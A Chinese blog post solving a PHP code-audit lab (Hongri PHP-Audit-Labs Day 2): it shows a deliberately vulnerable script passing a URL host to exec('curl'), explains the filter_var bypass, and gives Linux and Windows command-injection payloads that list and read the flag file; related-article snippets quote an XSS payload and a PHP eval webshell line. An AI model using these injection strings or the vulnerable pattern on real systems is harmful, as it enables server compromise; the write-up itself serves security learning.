代码审计——filter_var函数

最新推荐文章于 2021-11-15 15:54:34 发布
最新推荐文章于 2021-11-15 15:54:34 发布
阅读量1.2k 收藏 1
点赞数
分类专栏: web安全 文章标签: php 微信
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/negnegil/article/details/117819930
版权

这里写目录标题

红日安全代码审计——day2

原项目地址:
https://github.com/hongriSec/PHP-Audit-Labs/blob/master/Part1/Day2/files/README.md

本文是对day2课后习题的解题及学习

// index.php
<?php 
$url = $_GET['url'];
if(isset($url) && filter_var($url, FILTER_VALIDATE_URL)){
    $site_info = parse_url($url);
    if(preg_match('/sec-redclub.com$/',$site_info['host'])){
        exec('curl "'.$site_info['host'].'"', $result);
        echo "<center><h1>You have curl {$site_info['host']} successfully!</h1></center>
              <center><textarea rows='20' cols='90'>";
        echo implode(' ', $result);
    }
    else{
        die("<center><h1>Error: Host not allowed</h1></center>");
    }

}
else{
    echo "<center><h1>Just curl sec-redclub.com!</h1></center><br>
          <center><h3>For example:?url=http://sec-redclub.com</h3></center>";
}

?>

// f1agi3hEre.php
<?php  
$flag = "HRCTF{f1lt3r_var_1s_s0_c00l}"
?>

在这里插入图片描述

源码分析

分析源码,看到exec函数处就知道是让我们构造一个代码执行,读取f1agi3hEre.php中的falg。
通过GET方式传入url,要能通过第一个if判断,这里filter_var的过滤器FILTER_VALIDATE_URL的过滤规则为:把值作为URL来验证且默认模式下必须带有http://、ssh://等协议。接着向下,parse_url将我们传入的url进行分割,对主机名进行第二个if判断,判断主机名的尾部是否是sec-redclub.com,判断正确即可执行下面的命令执行语句:exec('curl "'.$site_info['host'].'"', $result); 。

这里想要通过第一个判断,url中必须包含
http://等协议和sec-redclub.com
这让我想到了url重定向和cors的绕过方式

backurl=http://example.com@sec-redclub.com   //url重定向

那就先试试这种方式行不行
在这里插入图片描述
发现这种方式是可行的,也能通过第二个判断,而要想读取flag还要回到命令执行的源码之中去

exec('curl "'.$site_info['host'].'"', $result);

我们希望构造的语句为

exec('curl "'.http://+待执行的命令+sec-redclub.com .'"',$result);

linux下的利用

这里我并没有分析出利用方式,但看了红日团队的解题知道了思路:
和sql注入的拼凑方式相似,这里我们可以通过使用多命令执行符让其执行多个命令,红日团队给出的利用方式为:

url=demo://";ls;#;sec-redclub.com:80/

注意:这里使用demo://替换http://的原因为http://中加入特殊符号无法通过filter_var的过滤
继续,拼接进原代码中为:

exec('curl "demo://"; ls ; # ;sec-redclub.com:80/'

同时执行多个命令,即使前面一个和最后一个执行不成功也没关系,只要我们想要的 ls 执行成功了就行
与此相似,将 ls 改成 cat f1agi3hEre.php 即可读取flag
但这里cat后的空格无法通过filter_var的检测,所以改成cat<f1agi3hEre.php即可读取flag
在这里插入图片描述
红日团队构造的语句为:

url=demo://";ls;%23;sec-redclub.com:80/

url=demo://";cat<f1agi3hEre.php;%23;sec-redclub.com:80/

windows下的利用

但是!

在我的环境中执行后确实这样的
在这里插入图片描述

这样的
在这里插入图片描述

想了好长时间,和官方给的解题对比了好几遍都没有发现问题
后来猛然想起来我他喵的是用windows搭的环境,而红日团队用的是linux。。。
修改成windows的命令,多行命令连接符也要修改,就变成了如下这样

url=demo://"||dir||"sec-redclub.com:80/

拼接到源码中就是:

curl"demo://"||dir||"sec-redclub.com:80/

解释:当curl"demo://"执行失败时执行dir,若dir执行失败则执行后面的
成功读取到目录下的文件
读取flag:

url=demo://"||type,f1agi3hEre.php||"sec-redclub.com:80/

这里使用逗号代替空格,原因是空格无法通过filter_var的过滤
在这里插入图片描述

成功

Thgilil
关注
专栏目录
Java代码审计前置知识——SpringMVC基础
m0_61506558的博客
10-25 484
Model2这样不仅提高的代码的复用率与项目的扩展性,且大大降低了项目的维护成本。Model 1模式的实现比较简单,适用于快速开发小规模项目,Model1中JSP页面身兼View和Controller两种角色,将控制逻辑和表现逻辑混杂在一起,从而导致代码的重用性非常低,增加了应用的扩展性和维护的难度。Model2消除了Model1的缺点。1.4 回顾ServletSpring MVC是Spring Framework的一部分,是基于Java实现MVC的轻量级Web框架轻量级,简单易学。
Web安全学习——代码审计入门
weixin_43815032的博客
01-28 724
一、常见的代码审计工具 1、Fortify SCA Fortify SCA是一个静态的、白盒的软件源代码安全测试工具,它通过内置的五大主要分析引擎:数据流、语义、结 2、Checkmarx CxSuite Checkmarx CxSuite的扫描结果可以以静态报表形式展示,也可以通过可以对软件安全漏洞和质量缺陷在代码的运 3、3...
php parse url ctf,【SSRF】如何绕过filter_var(), preg_match() 和 parse_url()
weixin_34094282的博客
04-14 673
0x01 前言这篇文章是在我看完一片国外安全大佬写的文章后对其进行总结并翻译得到的。0x02 正文之绕过filter_var和preg_match本片文章主要深入一种php ssrf的技术——如何绕过例如filter_var(), preg_match()和parse_url()等函数。本次我进行测试的php版本全部为php v5.6.30php-versionPHP 漏洞代码echo "Argu...
PHP filter_var() 函数 Filter 函数
fafa211的专栏
12-22 3028
定义和用法filter_var() 函数通过指定的过滤器过滤变量。如果成功,则返回已过滤的数据,如果失败,则返回 false。语法filter_var(variable, filter, options)参数描述variable必需。规定要过滤的变量。filter可选。规定要使用的过滤器的 ID。options规定
filter_var() 验证邮箱、ip、url的格式 php
白俊遥的博客
04-04 4126
验证邮箱格式的正确与否;你的第一解决方案是什么呢? 不管你们怎么思考的;反正我首先想到的就是字符串查找看是否有@符号; 但是对于结尾的.com或者.net 亦或者.cn等等越来越多的域名验证感觉棘手; 直到了某一天认真的研究了filter_var()函数的参数; 我对以前走马观花式的阅读php文档表示深深的惭愧; 其实filter_var()第二个参数传FILTER_VALIDATE
filter_var()函数
weixin_30897079的博客
08-05 156
我们使用payload:?url=javascript://comment%250aalert(1),可以执行alert函数: 实际上,这里的//在JavaScript中表示单行注释,所以后面的内容均为注释,那为什么会执行alert函数呢?那是因为我们这里用了字符%0a,该字符为换行符,所以alert语句与注释符//就不在同一行,就能执行。当然,...
PHP filter_var() 函数
aigoleague的专栏
09-21 494
定义和用法 filter_var() 函数通过指定的过滤器过滤变量。 如果成功,则返回已过滤的数据,如果失败,则返回 false。 filter_var(variable, filter, options) variable     必需。规定要过滤的变量。 filter     可选。规定要使用的过滤器的 ID。 options     规定包含标志/选项的数组。检查每个过滤器可能的
bugku 管理员系统 后台代码_代码审计——YXCMS
weixin_39613385的博客
10-24 560
前言YXcms是一个代码审计入门级的cms,比较适合想我这样的小白玩家进行操作。。。我一直想尝试审计一个cms,但是因为各种原因,一直搁置了。尝试分析一下YXCMS。。。相关环境源码信息 : Yxcms php建站系统 1.4.7本地环境 : phpstudy2018下载地址 :175.6.244.211:88/uploads/userup/1596/YXcmsApp1.4.7.zip...
php strlen ctf,PHP代码审计——EASY CTF篇
weixin_34315803的博客
03-11 737
0x01 extract变量覆盖$flag='xxx';extract($_GET);if(isset($shiyan)){$content=trim(file_get_contents($flag));if($shiyan==$content){echo'ctf{xxx}';}else{echo'Oh.no';}}?>?shiyan=&flag=1在file_get_content...
php审计之——常见危险函数
qq_44632427的博客
07-29 807
一、php代码执行函数 1、eval:把字符串$code作为代码来执行。很多常见的webshell都是用eval来执行具体操作的。 例如一句话: <?php @eval($_POST['xxx']);?> 2、assert:调试函数,检查第一个断言是否为FALSE。(把字符串$assertion作为php代码执行) 因为大多数杀软把eval列入黑名单了,所以用assert来代替eva...
PHP Filter 函数
weixin_30470643的博客
06-08 113
PHP 过滤器用于对来自非安全来源的数据(比如用户输入)进行验证和过滤。 filter 函数PHP 核心的组成部分。无需安装即可使用这些函数FILTER_CALLBACK 调用用户自定义函数来过滤数据。 FILTER_SANITIZE_STRING 去除标签,去除或编码特殊字符。 FILTER_SANITIZE_STRIPPED "string" 过滤器的别名...
php filter var,PHP filter_var()函数
weixin_33245968的博客
03-10 471
PHP中,filter_var()函数会使用指定的过滤器来过滤变量;它可以过滤用户传递来的数据。PHP filter_var()函数filter_var()函数使用指定的过滤器来过滤变量;它可用于验证和过滤数据。基本语法filter_var(var,filtername,options)参数:filter_var()函数接受三个参数var:表示要过滤的变量,不可省略(必填参数)。filterna...
php filter_var 正则,PHP filter_var() 函数 Filter 函数
weixin_39620334的博客
03-10 202
php 里面 filter 函数是一个函数系列的统称,filter 系列函数里面包括 filter_var 函数filter 系列函数PHP 核心的组成部分。无需安装即可使用这些函数。他主要用于对来自非安全来源的数据(比如用户输入)进行验证和过滤。而这里面 filter_var() 函数则主要是通过指定的过滤器来过滤变量。PHP Filter 函数PHP:指示支持该函数的最早的 PHP 版本...
filter_var — 使用特定的过滤器过滤一个变量
m0_37477061的博客
03-05 270
http://php.net/manual/zh/function.filter-var.php
php开启filtervar_PHP filter_var()函数过滤
weixin_35019131的博客
01-28 314
PHP filter_var()函数过滤检测一个数字是否在一个范围内。以下实例使用了 filter_var() 函数来检测一个 INT 型的变量是否在 1 到 200 内:实例$int = 122;$min = 1;$max = 200;if (filter_var($int, FILTER_VALIDATE_INT, array("options" => array("min_ran...
filter_var() 函数
冷月醉雪的博客
03-04 950
查看更多 https://www.yuque.com/docs/share/14d8d954-d003-4cd7-832d-9d0910ed036e
filter_var函数缺陷(CTF例题,附源码)
叶子的Blog
11-15 3314
基础知识 filter_var函数缺陷(原理+实践) 源代码 // index.php <?php $url = $_GET['url']; if(isset($url) && filter_var($url, FILTER_VALIDATE_URL)){ $site_info = parse_url($url); if(preg_match('/sec-redclub.com$/',$site_info['host'])){ exec('cu
php内置函数filter_var验证邮箱、url、ip是否符合格式
一只不正经的程序猿的博客
10-10 304
函数名:filter_var (PHP 5 >= 5.2.0, PHP 7) filter_var — 使用特定的过滤器过滤一个变量 php验证邮箱 <?php $email = '123456@qq.com'; $result = filter_var($email, FILTER_VALIDATE_EMAIL); var_dump($result); // 返回 "123456@qq.com" php验证url地址 <?php $url = "http://www.fyu
红日安全代码审计Day2 - filter_var函数缺陷详解
qq_45951598的博客
11-30 569
这里写目录标题Day2题解filter_var($url, FILTER_VALIDATE_URL)parse_urlpreg_matchimplode Day2题解 <?php $url = $_GET['url']; // 获取一个url // isset() 函数用于检测变量是否已设置并且非 NULL。 if(isset($url) && filter_var($url, FILTER_VALIDATE_URL)){ // FILTER_VALIDATE_URL :把
你给的代码中的filter_projection函数的作用是什么
最新发布
07-09
抱歉,之前的回答中我提到的`filter_projection`...因此,在示例代码中的`filter_projection`函数是一个占位符,您需要根据自己的需求和所使用的滤波方法,自行实现或调用相应的滤波函数库来完成对投影数据的滤波操作。
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值